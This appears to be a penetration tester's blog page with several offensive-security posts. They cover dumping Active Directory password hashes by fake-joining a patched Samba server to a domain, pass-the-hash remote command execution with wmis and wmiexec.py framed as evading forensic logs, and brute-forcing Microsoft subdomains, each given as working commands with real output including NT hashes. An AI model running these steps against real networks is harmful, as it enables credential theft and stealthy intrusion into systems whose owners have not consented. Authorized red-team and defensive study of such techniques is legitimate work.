Room362.com

Blatherings of a security addict.

Installing PyCrypto on OSX Mavericks


Keeping it here for notes and just in case anyone else runs into this same issue.

brew install pip
sudo ARCHFLAGS=-Wno-error=unused-command-line-argument-hard-error-in-future pip install pycrypto

If you have a better way please leave a comment below!

CCDC Red Teamer’s Creed


This is my box. There are many like it, but they are all mine.

My malware is my best friend. It is my life. I must master it as I must master my life.

My malware, without me, is useless. Without my malware, I am useless. I must drop my malware true. I must rootkit better than my enemy who is trying to kill my binary. I must kit him before he kits me. I will…

My malware and I know that what counts in this war is not the boxes we pop, the noise of our root dance, nor the cheers coming from the Red Team room. We know that it is the root that counts. We will root…

My malware is human, even as I, because it is my life. Thus, I will learn it as a brother. I will learn its weaknesses, its strength, its parts, its extensions, its dlls and its exes. I will keep my malware av free and ready, even as I am ready. We will become part of each other. We will…

Before God, I swear this creed. My malware and I are the defenders of my botnet. We are the masters of our enemy. We are the saviors of my shells.

So be it, until victory is the Red Team’s and there is no enemy, but peace!

Dumping NTDS.dit Domain Hashes Using Samba


So there was this blog post by @lanjelot (definitely someone to follow) talking about a number of ways to dump Windows credentials, here: https://www.securusglobal.com/community/2013/12/20/dumping-windows-credentials/ and at the very bottom of this post it says “AD Replication (EXPERIMENTAL)”.

What it boils down to is: if you can position a system that can do DNS resolution for the target domain and send some other UDP traffic, you can fake-join a Samba server you control to the domain, and it doesn’t require code execution of any kind on the domain controller.

Notice: I am not doing this on a Kali Linux box; there is already an install of Samba there and I didn’t want to try uninstalling or modifying the one installed.

First, you need this patch:

wget http://files.securusglobal.com/samba-4.1.0_replication-only-patch.txt

and Samba 4.1.0

wget http://ftp.samba.org/pub/samba/stable/samba-4.1.0.tar.gz

You will probably also require some dependencies to be installed:

apt-get install python2.7-dev python-samba libacl1-dev build-essential libldap2-dev libkrb5-dev attr

Since the patch is kinda wonky, you need to make a src directory and extract Samba into there first. Then apply the patch from whatever directory is above src.

mkdir src
mv samba-4.1.0.tar.gz src/
cd src/
tar zxvf samba-4.1.0.tar.gz
cd /root/

So it would look like this:

samba-4.1.0_replication-only-patch.txt
src/
src/samba-4.1.0/

Then run patch -p0 < samba-4.1.0_replication-only-patch.txt and build:

cd ./src/samba-4.1.0/
./configure
make
make install

Prepare the box:

rm -rf /var/lib/samba; mkdir /var/lib/samba; rm -f /etc/samba/smb.conf

Next you need to make sure you are resolving correctly (if you can’t resolve the SRV record _ldap._tcp.sittingduck.info, sittingduck.info being the domain, then this isn’t going to work).

echo nameserver 192.168.92.37 > /etc/resolv.conf # this is the IP address of the DC

Then start the clone:

/usr/local/samba/bin/samba-tool domain join sittingduck.info DC -U sittingduck\\administrator

Looks like this:

root@sambabox:~/src/samba-4.1.0# /usr/local/samba/bin/samba-tool domain join sittingduck.info DC -U sittingduck\\administrator
Finding a writeable DC for domain 'sittingduck.info'
Found DC 2K8DC.sittingduck.info
Password for [SITTINGDUCK\administrator]:
workgroup is SITTINGDUCK
realm is sittingduck.info
Calling bare provision
No IPv6 address will be assigned
Provision OK for domain DN DC=sittingduck,DC=info
Starting replication
Schema-DN[CN=Schema,CN=Configuration,DC=sittingduck,DC=info] objects[402] linked_values[0]
Schema-DN[CN=Schema,CN=Configuration,DC=sittingduck,DC=info] objects[804] linked_values[0]
Schema-DN[CN=Schema,CN=Configuration,DC=sittingduck,DC=info] objects[1206] linked_values[0]
Schema-DN[CN=Schema,CN=Configuration,DC=sittingduck,DC=info] objects[1521] linked_values[0]
Analyze and apply schema objects
Partition[CN=Configuration,DC=sittingduck,DC=info] objects[402] linked_values[0]
Partition[CN=Configuration,DC=sittingduck,DC=info] objects[804] linked_values[0]
Partition[CN=Configuration,DC=sittingduck,DC=info] objects[1206] linked_values[0]
Partition[CN=Configuration,DC=sittingduck,DC=info] objects[1608] linked_values[1]
Partition[CN=Configuration,DC=sittingduck,DC=info] objects[1614] linked_values[11]
Replicating critical objects from the base DN of the domain
Partition[DC=sittingduck,DC=info] objects[100] linked_values[24]
Partition[DC=sittingduck,DC=info] objects[353] linked_values[27]
Done with always replicated NC (base, config, schema)
Committing SAM database
descriptor_sd_propagation_recursive: DC=DomainDnsZones,DC=sittingduck,DC=info not found under DC=sittingduck,DC=info
descriptor_sd_propagation_recursive: DC=ForestDnsZones,DC=sittingduck,DC=info not found under DC=sittingduck,DC=info
Joined domain SITTINGDUCK (SID S-1-5-21-3147519476-3247671789-820278723) as a DC

Then to get the hashes:

root@sambabox:~# /usr/local/samba/bin/pdbedit -L -w
2K8DC$:4294967295:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:CB14F1166BBE1749AC0FB40240C5DC30:[S          ]:LCT-530FC425:
Administrator:4294967295:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:88E4D9FABAECF3DEC18DD80905521B29:[U          ]:LCT-531006A4:
krbtgt:4294967295:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:F2EE6AB6F40810169E0E46B126CEFBEF:[DU         ]:LCT-530FC3FF:
nobody:65534:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:[U          ]:LCT-00000000:
jdoe:4294967295:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:88E4D9FABAECF3DEC18DD80905521B29:[UX         ]:LCT-530FC5FF:
uber:4294967295:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:88E4D9FABAECF3DEC18DD80905521B29:[UX         ]:LCT-53101261:

Or you can do it with history:

root@sambabox:~# python samba-pwdump.py /usr/local/samba/private/sam.ldb.d/DC\=SITTINGDUCK\,DC\=INFO.ldb -history
SAMBACLONE$:1104:::::
2K8DC$:1000::cb14f1166bbe1749ac0fb40240c5dc30:::
Administrator:500::88e4d9fabaecf3dec18dd80905521b29:::
krbtgt:502::f2ee6ab6f40810169e0e46b126cefbef:::
Guest:501:::::
jdoe:1103::88e4d9fabaecf3dec18dd80905521b29:::
uber:1105::88e4d9fabaecf3dec18dd80905521b29:::
uber_history0:1105:444d1edcad01ae08f49f073e12e8cc14:88e4d9fabaecf3dec18dd80905521b29:::

Game over. The great thing is that it never actually shows up as a joined box in the domain, and as far as I can tell the only log on the real DC is the login success of a domain admin. Plus, one of the huge benefits to this method is that once you have the database, Samba makes it really easy to query information like group membership or user info after the fact, not just hashes.
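As an added example (not part of the original post), here is a small Ruby audit that parses the smbpasswd-format lines pdbedit -L -w prints above and reports accounts sharing an NT hash, which is the password reuse visible in that dump (Administrator, jdoe and uber). The sample input is constructed from the post’s own output so it runs offline; the Entry struct and function names are my own.

```ruby
#!/usr/bin/env ruby
# Added example, not from the original post: parse `pdbedit -L -w` output
# (smbpasswd format) and flag accounts that share an NT hash, i.e. password
# reuse. SAMPLE_DUMP is constructed from the dump shown in the post.

NO_HASH = 'X' * 32  # pdbedit prints 32 X's where a hash is not stored

Entry = Struct.new(:name, :uid, :lm, :nt, :flags, :lct)

# One smbpasswd line looks like:  name:uid:LMHASH:NTHASH:[flags]:LCT-hex:
# The shell prompt line that precedes the dump is skipped.
def parse_pdbedit(text)
  text.each_line.map do |line|
    line = line.strip
    next if line.empty? || line.start_with?('root@')
    f = line.split(':')
    next unless f.size >= 6
    Entry.new(f[0], f[1].to_i, f[2], f[3], f[4].delete('[] '), f[5])
  end.compact
end

# Group accounts by NT hash (case-insensitive), ignoring accounts with no
# stored hash, and keep only hashes used by more than one account.
def shared_nt_hashes(entries)
  entries.reject { |e| e.nt == NO_HASH }
         .group_by { |e| e.nt.downcase }
         .select { |_hash, es| es.size > 1 }
         .transform_values { |es| es.map(&:name) }
end

# Machine accounts end in '$'; the 'D' flag marks a disabled account.
def enabled_user_accounts(entries)
  entries.reject { |e| e.name.end_with?('$') || e.flags.include?('D') }
end

# Constructed from the post's pdbedit output (LM hashes are not stored).
SAMPLE_DUMP = <<~DUMP
  root@sambabox:~# /usr/local/samba/bin/pdbedit -L -w
  2K8DC$:4294967295:#{NO_HASH}:CB14F1166BBE1749AC0FB40240C5DC30:[S          ]:LCT-530FC425:
  Administrator:4294967295:#{NO_HASH}:88E4D9FABAECF3DEC18DD80905521B29:[U          ]:LCT-531006A4:
  krbtgt:4294967295:#{NO_HASH}:F2EE6AB6F40810169E0E46B126CEFBEF:[DU         ]:LCT-530FC3FF:
  nobody:65534:#{NO_HASH}:#{NO_HASH}:[U          ]:LCT-00000000:
  jdoe:4294967295:#{NO_HASH}:88E4D9FABAECF3DEC18DD80905521B29:[UX         ]:LCT-530FC5FF:
  uber:4294967295:#{NO_HASH}:88E4D9FABAECF3DEC18DD80905521B29:[UX         ]:LCT-53101261:
DUMP

if __FILE__ == $0
  entries = parse_pdbedit(SAMPLE_DUMP)
  puts "#{entries.size} accounts, #{enabled_user_accounts(entries).size} enabled user accounts"
  shared_nt_hashes(entries).each do |hash, names|
    puts "NT hash #{hash} is shared by: #{names.join(', ')}"
  end
end
```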

Executing Code via SMB / DCOM Without PSEXEC


PSEXEC has been a staple for Windows post exploitation pivoting and system administration for a long while. The basic premise of how all “psexec” tools work is:

  1. (Optional) Upload a service executable (PSEXECSVC.EXE in the case of SysInternal’s tool) to the ADMIN$ share
  2. Connect to the service manager on the remote host, and create a service based on either a local (to the remote system) executable or the uploaded one.
  3. Run the service
  4. Stop and delete the service and the uploaded file, pulling down the resulting output from the execution, if any.

Now, as you can guess, the uploading of a file and the creating, starting, stopping, and deleting of services create quite a lot of logs and forensic evidence.

As you might imagine, that’s not the best thing for us on the offensive side of infosec. Luckily big brother Microsoft provides another option, WMI (Windows Management Interface). I demonstrated the use of this in the past: HERE and HERE

The downside to using the WMIC directly is that you need a valid token or a valid password for it to work. Passing the hash didn’t used to be an available option.

That has changed with the “wmis” package on Kali Linux that incorporates the “Pass-the-Hash for 15 years toolkit”.

(There is a slight problem where you have to play with it a bit to get it working on 64 bit Kali)

The other solution is supplied as an example in the Impacket library “wmiexec.py”. In my experience there are a few features that make it the better option.

  1. Installing it on a random VPS is dead simple and doesn’t need the Kali repos to get right, nor Debian/Ubuntu.
  2. It defaults to a “semi-interactive shell” which writes and reads output via the ADMIN$ share by default, something I would normally have to do manually with a bunch of tools.
  3. As with the WMIS package, it allows you to just create a process without the ADMIN$ write/read.

Enough crazy talk; here is an example usage of each:

WMIS

Usage:

root@wpad:~# wmis
Usage: [-?NPV] [-?|--help] [--usage] [-d|--debuglevel=DEBUGLEVEL] [--debug-stderr] [-s|--configfile=CONFIGFILE]
        [--option=name=value] [-l|--log-basename=LOGFILEBASE] [--leak-report] [--leak-report-full]
        [-R|--name-resolve=NAME-RESOLVE-ORDER] [-O|--socket-options=SOCKETOPTIONS] [-n|--netbiosname=NETBIOSNAME]
        [-W|--workgroup=WORKGROUP] [--realm=REALM] [-i|--scope=SCOPE] [-m|--maxprotocol=MAXPROTOCOL]
        [-U|--user=[DOMAIN\]USERNAME[%PASSWORD]] [-N|--no-pass] [--password=STRING] [-A|--authentication-file=FILE]
        [-S|--signing=on|off|required] [-P|--machine-pass] [--simple-bind-dn=STRING] [-k|--kerberos=STRING]
        [--use-security-mechanisms=STRING] [-V|--version]
        //host

Example: wmis -U [domain/]adminuser%password //host cmd.exe /c dir c:\ > c:\windows\temp\output.txt 

Example:

root@wpad:~# wmis -U administrator%aad3b435b51404eeaad3b435b51404ee:88e4d9fabaecf3dec18dd80905521b29 //172.16.102.141 calc.exe
HASH PASS: Substituting user supplied NTLM HASH...
HASH PASS: Substituting user supplied NTLM HASH...
[wmi/wmis.c:172:main()] 1: calc.exe
NTSTATUS: NT_STATUS_OK - Success

wmiexec.py

It can be used with a password, but with hashes you just give it -hashes:

Usage:

root@wpad:~/impacket/examples# ./wmiexec.py 
Impacket v0.9.12-dev - Copyright 2002-2014 Core Security Technologies

usage: wmiexec.py [-h] [-share SHARE] [-nooutput] [-hashes LMHASH:NTHASH]
                  target [command [command ...]]

positional arguments:
  target                [domain/][username[:password]@]<address>
  command               command to execute at the target. If empty it will
                        launch a semi-interactive shell

optional arguments:
  -h, --help            show this help message and exit
  -share SHARE          share where the output will be grabbed from (default
                        C$)
  -nooutput             whether or not to print the output (no SMB connection
                        created)

authentication:
  -hashes LMHASH:NTHASH
                        NTLM hashes, format is LMHASH:NTHASH

Example:

root@wpad:~/impacket/examples# ./wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:88e4d9fabaecf3dec18dd80905521b29 administrator@172.16.102.141
Impacket v0.9.12-dev - Copyright 2002-2014 Core Security Technologies

SMBv2.1 dialect used
[!] Launching semi-interactive shell - Careful what you execute
C:\>dir
 Volume in drive C has no label.
 Volume Serial Number is 5CCA-B528

 Directory of C:\

07/13/2009  11:20 PM    <DIR>          PerfLogs
10/07/2013  03:26 PM    <DIR>          Program Files
07/14/2009  01:08 AM    <DIR>          Program Files (x86)
04/25/2014  02:21 AM    <DIR>          Users
05/11/2014  03:39 PM    <DIR>          Windows
               0 File(s)              0 bytes
               5 Dir(s)  52,884,389,888 bytes free

C:\>

Iterative DNS Brute Forcing


Everyone has their list of hostnames they brute force domains with. In my last post I even mentioned a few ways to use one with XARGS or PARALLEL. But one fact about wordlist brute forcing is that there is no “one list to rule them all”. Over the years of doing DNS record collection I have noticed one thing: most domains have a large number of short hostnames that are easy to remember, usually 4 characters or less.

I’m sure you already know where I’m going with this, I wanted to brute force all possible hostnames up to 4 characters. For a long time I struggled with coding this, but couldn’t wrap my head around it. I would come back to it every so often, finally a few days ago I happened upon a script on gist: https://gist.github.com/petehamilton/4755855 that suited my needs perfectly.

I modified it to suit my needs (just use the yield method) and here is what I ended up with (remember DNS is case insensitive):

Notice: this script doesn’t end; it will keep doing lookups on longer and longer hostnames until you hit CTRL-C.

#!/usr/bin/env ruby

#
## Brute code stolen from: https://gist.github.com/petehamilton/4755855
#

@domain = 'microsoft.com'

# Look up sub.@domain with dig and print whatever answer section comes back.
# Always returns false so the generator below never stops.
def result?(sub)
  results = %x(dig +noall #{sub}.#{@domain} +answer)
  if results != ""
      puts "============================"
      puts "FOUND: \t#{sub}"
      puts "============================"
      puts "#{results}"
      puts "============================"
  end
  false
end

# Walk every candidate label, returning early only if result? ever says so.
def crack_yielding(chars)
  crack_yield(chars){ |p|
      return p if result?(p)
  }
end


# Yield all 1-character labels, then recurse so that each label of the
# previous length gets every character appended (2, 3, 4, ... characters).
def crack_yield(chars)
  chars.each { |c| yield c }

  crack_yield(chars) { |c|
      chars.each do |x|
          yield c + x
      end
  }
end

chars = ('a'..'z').to_a
(0..9).each {|x| chars << x.to_s}

crack_yielding(chars)

This worked but it was slow, so I sped it up using methods that I talked about in my last post and a quick modification:

I used this:

#!/usr/bin/env ruby

#
## Brute code stolen from: https://gist.github.com/petehamilton/4755855
#

# Just print the candidate; the lookups are done by parallel + dig outside.
# Always returns false so the generator keeps going.
def result?(sub)
  puts sub
  false
end

def crack_yielding(chars)
  crack_yield(chars){ |p|
      return p if result?(p)
  }
end


# Yield all 1-character labels, then recurse to build longer ones.
def crack_yield(chars)
  chars.each { |c| yield c }

  crack_yield(chars) { |c|
      chars.each do |x|
          yield c + x
      end
  }
end

chars = ('a'..'z').to_a
(0..9).each {|x| chars << x.to_s}

crack_yielding(chars)

which just prints all the possibilities:

a
b
c
d
e
f
...

and piped it into parallel + dig:

ruby brutelist.rb | parallel -j100 dig +noall {}.microsoft.com +answer

and got the following:

c.microsoft.com. 2   IN  CNAME   c.microsoft.akadns.net.
c.microsoft.akadns.net.   499 IN  A   65.55.58.184
e.microsoft.com.  3599    IN  A   191.234.1.50
g.microsoft.com.  2798    IN  CNAME   g.msn.com.
g.msn.com.        99  IN  CNAME   g.msn.com.nsatc.net.
g.msn.com.nsatc.net.  148 IN  A   131.253.34.154
i.microsoft.com.  779 IN  CNAME   i.toggle.www.ms.akadns.net.
i.toggle.www.ms.akadns.net. 44    IN  CNAME   i.g.www.ms.akadns.net.
i.g.www.ms.akadns.net.    225 IN  CNAME   i.microsoft.com.edgesuite.net.
i.microsoft.com.edgesuite.net. 116 IN CNAME   a1475.g.akamai.net.
a1475.g.akamai.net.   16  IN  A   23.45.65.26
a1475.g.akamai.net.   16  IN  A   23.45.65.33
m.microsoft.com.  3599    IN  CNAME   origin.mobile.ms.akadns.net.
origin.mobile.ms.akadns.net. 299 IN   A   65.55.186.235
s.microsoft.com.  3599    IN  CNAME   reroute.microsoft.com.
reroute.microsoft.com.    3599    IN  A   65.55.58.201
reroute.microsoft.com.    3599    IN  A   64.4.11.37
cs.microsoft.com. 81  IN  CNAME   wedcs.trafficmanager.net.
wedcs.trafficmanager.net. 7   IN  CNAME   wedcseus.cloudapp.net.
wedcseus.cloudapp.net.    8   IN  A   137.116.48.250
...
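Added example, not one of the post’s scripts: a bounded, non-recursive version of the label generator above (so it terminates at a chosen length instead of needing CTRL-C), together with a parser for the dig +noall +answer output the pipeline produces that keeps only the names directly under the target domain, dropping the CNAME chain hops (akadns.net, msn.com, and so on) that clutter the result list. The function names are mine, and the sample output is constructed from the records shown above so the script runs offline.

```ruby
#!/usr/bin/env ruby
# Added example, not part of the original post: bounded label generator plus
# a parser for `dig +noall +answer` output. SAMPLE_DIG_OUTPUT is constructed
# from the results shown in the post.

DOMAIN = 'microsoft.com'
CHARS  = ('a'..'z').to_a + ('0'..'9').to_a

# Yield every label of length 1..max_len, shortest first (same order as the
# recursive crack_yield in the post, but bounded and without deepening the
# call stack for each extra character).
def each_label(chars, max_len)
  return enum_for(:each_label, chars, max_len) unless block_given?
  current = chars.dup
  (1..max_len).each do |len|
    current.each { |label| yield label }
    break if len == max_len
    current = current.product(chars).map(&:join)
  end
end

# Parse answer lines of the form "name. ttl IN TYPE rdata" into
# { hostname => [[type, rdata], ...] }, keeping only names exactly one label
# below domain. Lines dig prints as errors (e.g. the "empty label" complaint
# seen in the post) are skipped.
def parse_dig_answers(text, domain)
  found = Hash.new { |h, k| h[k] = [] }
  depth = domain.count('.') + 1
  text.each_line do |line|
    next if line.start_with?('dig:')
    fields = line.strip.split(/\s+/, 5)
    next unless fields.size == 5 && fields[2] == 'IN'
    name, _ttl, _class, type, rdata = fields
    name = name.chomp('.').downcase
    next unless name.end_with?(".#{domain}") && name.count('.') == depth
    found[name] << [type, rdata.chomp('.')]
  end
  found
end

# Constructed from the post's output, including one dig error line.
SAMPLE_DIG_OUTPUT = <<~DIG
  c.microsoft.com. 2   IN  CNAME   c.microsoft.akadns.net.
  c.microsoft.akadns.net.   499 IN  A   65.55.58.184
  e.microsoft.com.  3599    IN  A   191.234.1.50
  g.microsoft.com.  2798    IN  CNAME   g.msn.com.
  g.msn.com.        99  IN  CNAME   g.msn.com.nsatc.net.
  dig: 'm..microsoft.com' is not a legal name (empty label)
DIG

if __FILE__ == $0
  puts "#{each_label(CHARS, 2).count} candidate labels of length 1..2"
  parse_dig_answers(SAMPLE_DIG_OUTPUT, DOMAIN).each do |host, records|
    puts "#{host}: #{records.map { |t, r| "#{t} #{r}" }.join(', ')}"
  end
end
```

Piping each_label’s output into the same parallel + dig command as above, and the collected answers back into parse_dig_answers, gives a clean list of which short names actually exist.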

Happy bruting. Both scripts can be found on my gists page:

Hostname Bruteforcing on the Cheap



Quick update: As @MikeDamm points out, xargs has a -P option that can do the same thing I’m using parallel for. If you have a supported version of xargs you can use -P 0 to do the same thing as -j0 with parallel, but if your version doesn’t support the 0 you can simply use the same number parallel uses, ala:

  • cat subdomains.txt | xargs -P 122 -I subdomain dig +noall subdomain.microsoft.com +answer

This results in roughly the same completion time as its parallel counterpart. Thanks @MikeDamm!


There are some great discussions on the NoVA Hackers mailing list. One such discussion was about what the best way to do dns hostname brute forcing was and which tool is better than another. For me, I just use the command line and then parse the results (or just ask the deepmagic.com database ;–)

Here is what I do:

First, you need a good list of DNS sub domains / hostnames. Personally I use the list provided over at http://www.ethicalhack3r.co.uk/zone-transfers-on-the-alexa-top-1-million/ (with a few minor tweaks). If you haven’t read that post and follow-on posts you really should. But take the list and save it locally. Then just run the following command:

  • cat subdomains.txt | xargs -t -I subdomain dig +noall subdomain.microsoft.com +answer

Now, xargs is great but does one thing at a time and can be quite slow if your subdomains list is large. With the use of the amazing tool GNU parallel you can get done in a matter of seconds, well, that or knock over your home router.

  • cat subdomains.txt | parallel -k -j0 dig +noall {}.microsoft.com +answer

Warning: the -j0 option maxes out the possible file handles and jobs that your CPU/kernel can handle, which usually destroys VMs. Just use a smaller job count like 100 or 50 if you want the speed without the crash ;–)

with output something like this:

parallel: Warning: Only enough file handles to run 122 jobs in parallel.
Raising ulimit -n or /etc/security/limits.conf may help.
parallel: Warning: No more file handles. Raising ulimit -n or /etc/security/limits.conf may help.
mail.microsoft.com.   2369    IN  A   131.107.125.5
www.microsoft.com.    0   IN  CNAME   toggle.www.ms.akadns.net.
toggle.www.ms.akadns.net. 0   IN  CNAME   g.www.ms.akadns.net.
g.www.ms.akadns.net.  0   IN  CNAME   lb1.www.ms.akadns.net.
lb1.www.ms.akadns.net.    263 IN  A   64.4.11.42
m.microsoft.com.  0   IN  CNAME   origin.mobile.ms.akadns.net.
origin.mobile.ms.akadns.net. 300 IN   A   65.55.186.235
ftp.microsoft.com.    0   IN  CNAME   ftp.microsoft.akadns.net.
ftp.microsoft.akadns.net. 259 IN  A   64.4.17.176
mobile.microsoft.com. 0   IN  CNAME   origin.mobile.ms.akadns.net.
origin.mobile.ms.akadns.net. 300 IN   A   65.55.186.235
smtp.microsoft.com.   3600    IN  A   131.107.115.215
smtp.microsoft.com.   3600    IN  A   131.107.115.214
smtp.microsoft.com.   3600    IN  A   205.248.106.64
smtp.microsoft.com.   3600    IN  A   205.248.106.30
smtp.microsoft.com.   3600    IN  A   205.248.106.32
smtp.microsoft.com.   3600    IN  A   131.107.115.212
search.microsoft.com. 0   IN  CNAME   search.microsoft.akadns.net.
search.microsoft.akadns.net. 0    IN  CNAME   search.msn.com.edgesuite.net.
search.msn.com.edgesuite.net. 0   IN  CNAME   a134.g.akamai.net.
a134.g.akamai.net.    19  IN  A   209.107.220.27
a134.g.akamai.net.    19  IN  A   209.107.220.35
dev.microsoft.com.    0   IN  CNAME   msdn.microsoft.com.
msdn.microsoft.com.   0   IN  CNAME   msdn.microsoft.akadns.net.
msdn.microsoft.akadns.net. 600    IN  A   157.56.148.19
img.microsoft.com.    0   IN  CNAME   i.microsoft.com.edgesuite.net.
i.microsoft.com.edgesuite.net. 0 IN   CNAME   a1475.g.akamai.net.
a1475.g.akamai.net.   20  IN  A   165.254.158.48
a1475.g.akamai.net.   20  IN  A   165.254.158.9
news.microsoft.com.   0   IN  CNAME   msnews.microsoft.com.
msnews.microsoft.com. 3600    IN  A   207.46.248.16
mail2.microsoft.com.  3600    IN  A   131.107.115.215
beta.microsoft.com.   0   IN  CNAME   connect.microsoft.akadns.net.
connect.microsoft.akadns.net. 300 IN  A   65.52.103.84
support.microsoft.com.    0   IN  CNAME   mso-geo.microsoft.akadns.net.
mso-geo.microsoft.akadns.net. 0   IN  CNAME   support.microsoft.akadns.net.
support.microsoft.akadns.net. 175 IN  A   157.56.56.139
my.microsoft.com. 3600    IN  A   134.170.255.29
help.microsoft.com.   0   IN  CNAME   help.msn.com.
mail3.microsoft.com.  3600    IN  A   131.107.115.214
download.microsoft.com.   0   IN  CNAME   download.microsoft.com.nsatc.net.
download.microsoft.com.nsatc.net. 0 IN    CNAME   main.dl.ms.akadns.net.
main.dl.ms.akadns.net.    0   IN  CNAME   download.microsoft.com.edgesuite.net.
download.microsoft.com.edgesuite.net. 0   IN CNAME a954.dscms.akamai.net.
a954.dscms.akamai.net.    0   IN  CNAME   a954.dscms.akamai.net.0.1.cn.akamaitech.net.
a954.dscms.akamai.net.0.1.cn.akamaitech.net. 1 IN A 69.31.75.184
a954.dscms.akamai.net.0.1.cn.akamaitech.net. 1 IN A 69.31.75.168
shop.microsoft.com.   3600    IN  A   64.4.11.37
shop.microsoft.com.   3600    IN  A   65.55.58.201
games.microsoft.com.  3600    IN  A   207.46.166.10
business.microsoft.com.   3600    IN  A   65.55.57.98
ws.microsoft.com. 0   IN  CNAME   ws.microsoft.com.nsatc.net.
gateway.microsoft.com.    3600    IN  A   131.107.16.142
gateway.microsoft.com.    3600    IN  A   131.107.16.143
members.microsoft.com.    0   IN  CNAME   members.microsoft.akadns.net.
members.microsoft.akadns.net. 219 IN  A   65.55.57.28
c.microsoft.com.  0   IN  CNAME   c.microsoft.akadns.net.
c.microsoft.akadns.net.   215 IN  A   65.55.58.199
g.microsoft.com.  0   IN  CNAME   g.msn.com.
g.msn.com.        0   IN  CNAME   g.msn.com.nsatc.net.
g.msn.com.nsatc.net.  142 IN  A   131.253.34.154
mail4.microsoft.com.  3600    IN  A   205.248.106.64
mail1.microsoft.com.  3600    IN  A   131.107.115.212
apps.microsoft.com.   0   IN  CNAME   apps.windows.akadns.net.
apps.windows.akadns.net. 0    IN  CNAME   services.windows.akadns.net.
services.windows.akadns.net. 0    IN  CNAME   services-perf.windows.akadns.net.
services-perf.windows.akadns.net. 46 IN   A   134.170.30.204
email.microsoft.com.  1989    IN  A   157.55.150.73
i.microsoft.com.  0   IN  CNAME   i.toggle.www.ms.akadns.net.
i.toggle.www.ms.akadns.net. 0 IN  CNAME   i.g.www.ms.akadns.net.
i.g.www.ms.akadns.net.    0   IN  CNAME   i.microsoft.com.edgesuite.net.
i.microsoft.com.edgesuite.net. 0 IN   CNAME   a1475.g.akamai.net.
a1475.g.akamai.net.   8   IN  A   23.62.111.114
a1475.g.akamai.net.   8   IN  A   23.62.111.104
s.microsoft.com.  0   IN  CNAME   reroute.microsoft.com.
reroute.microsoft.com.    3600    IN  A   64.4.11.37
reroute.microsoft.com.    3600    IN  A   65.55.58.201
community.microsoft.com. 0    IN  CNAME   communities.microsoft.com.
communities.microsoft.com. 3600   IN  A   64.4.11.37
communities.microsoft.com. 3600   IN  A   65.55.58.201
connect.microsoft.com.    0   IN  CNAME   connect.microsoft.akadns.net.
connect.microsoft.akadns.net. 152 IN  A   65.52.103.84
rss.microsoft.com.    796 IN  A   65.55.58.201
rss.microsoft.com.    796 IN  A   64.4.11.37
home.microsoft.com.   0   IN  CNAME   redir.blu.cb3.glbdns.microsoft.com.
redir.blu.cb3.glbdns.microsoft.com. 116   IN A    65.55.206.229
jp.microsoft.com. 3600    IN  A   65.55.58.201
jp.microsoft.com. 3600    IN  A   64.4.11.37
labs.microsoft.com.   3600    IN  A   64.4.11.37
labs.microsoft.com.   3600    IN  A   65.55.58.201
exchange.microsoft.com.   2120    IN  A   65.55.31.35
marketing.microsoft.com. 3600 IN  A   207.46.242.110
mac.microsoft.com.    3600    IN  A   64.4.11.37
mac.microsoft.com.    3600    IN  A   65.55.58.201
feeds.microsoft.com.  3600    IN  A   65.55.57.98
partners.microsoft.com.   0   IN  CNAME   pmc.partners.microsoft.akadns.net.
pmc.partners.microsoft.akadns.net. 300 IN A   131.107.119.14
feed.microsoft.com.   0   IN  CNAME   feed.trafficmanager.net.
feed.trafficmanager.net. 0    IN  CNAME   feedna.cloudapp.net.
feedna.cloudapp.net.  10  IN  A   65.52.9.172
partner.microsoft.com.    0   IN  CNAME   portal.partners.microsoft.akadns.net.
portal.partners.microsoft.akadns.net. 300 IN A    131.107.119.163
cs.microsoft.com. 0   IN  CNAME   wedcs.trafficmanager.net.
wedcs.trafficmanager.net. 0   IN  CNAME   wedcseus.cloudapp.net.
wedcseus.cloudapp.net.    10  IN  A   137.116.48.250
forums.microsoft.com. 0   IN  CNAME   forums.microsoft.akadns.net.
forums.microsoft.akadns.net. 600 IN   A   65.52.103.99
meet.microsoft.com.   3600    IN  A   131.107.1.71
e.microsoft.com.  3600    IN  A   191.234.1.50
autodiscover.microsoft.com. 2358 IN   A   131.107.125.5
im.microsoft.com. 3600    IN  A   131.107.1.75
sip.microsoft.com.    2228    IN  A   65.55.30.130
me.microsoft.com. 0   IN  CNAME   edm.cloudapp.net.
dig: 'm..microsoft.com' is not a legal name (empty label)
billing.microsoft.com.    0   IN  CNAME   paymenthubprod.trafficmanager.net.
paymenthubprod.trafficmanager.net. 0 IN   CNAME   paymenthubuxprod1.cloudapp.net.
paymenthubuxprod1.cloudapp.net.   10 IN   A   168.62.198.20
profile.microsoft.com.    0   IN  CNAME   profile.microsoft.akadns.net.
profile.microsoft.akadns.net. 335 IN  A   64.4.11.47
research.microsoft.com.   806 IN  A   131.107.65.14
sharepoint.microsoft.com. 3463    IN  A   64.4.6.100
sharepoint.microsoft.com. 3463    IN  A   65.55.39.10
appdev.microsoft.com. 0   IN  CNAME   appdev.windows.akadns.net.
appdev.windows.akadns.net. 131    IN  A   134.170.30.200
newsletters.microsoft.com. 3150   IN  A   207.46.248.35
advertising.microsoft.com. 0  IN  CNAME   advertising.microsoft.com.nsatc.net.
advertising.microsoft.com.nsatc.net. 245 IN A 65.52.100.46
catalog.microsoft.com.    0   IN  CNAME   genuine.microsoft.akadns.net.
genuine.microsoft.akadns.net. 300 IN  A   65.55.58.177
social.microsoft.com. 0   IN  CNAME   lb.social.ms.akadns.net.
lb.social.ms.akadns.net. 54   IN  A   65.52.103.78
events.microsoft.com. 1776    IN  A   64.4.11.31
events.microsoft.com. 1776    IN  A   65.55.58.192
ajax.microsoft.com.   0   IN  CNAME   mscomajax.vo.msecnd.net.
mscomajax.vo.msecnd.net. 208  IN  A   65.54.81.164
mscomajax.vo.msecnd.net. 208  IN  A   65.54.81.12
developer.microsoft.com. 0    IN  CNAME   msdn.microsoft.com.
msdn.microsoft.com.   0   IN  CNAME   msdn.microsoft.akadns.net.
msdn.microsoft.akadns.net. 600    IN  A   157.56.148.19
bbs.microsoft.com.    0   IN  CNAME   transfer.microsoft.com.
transfer.microsoft.com.   3600    IN  A   64.4.10.152
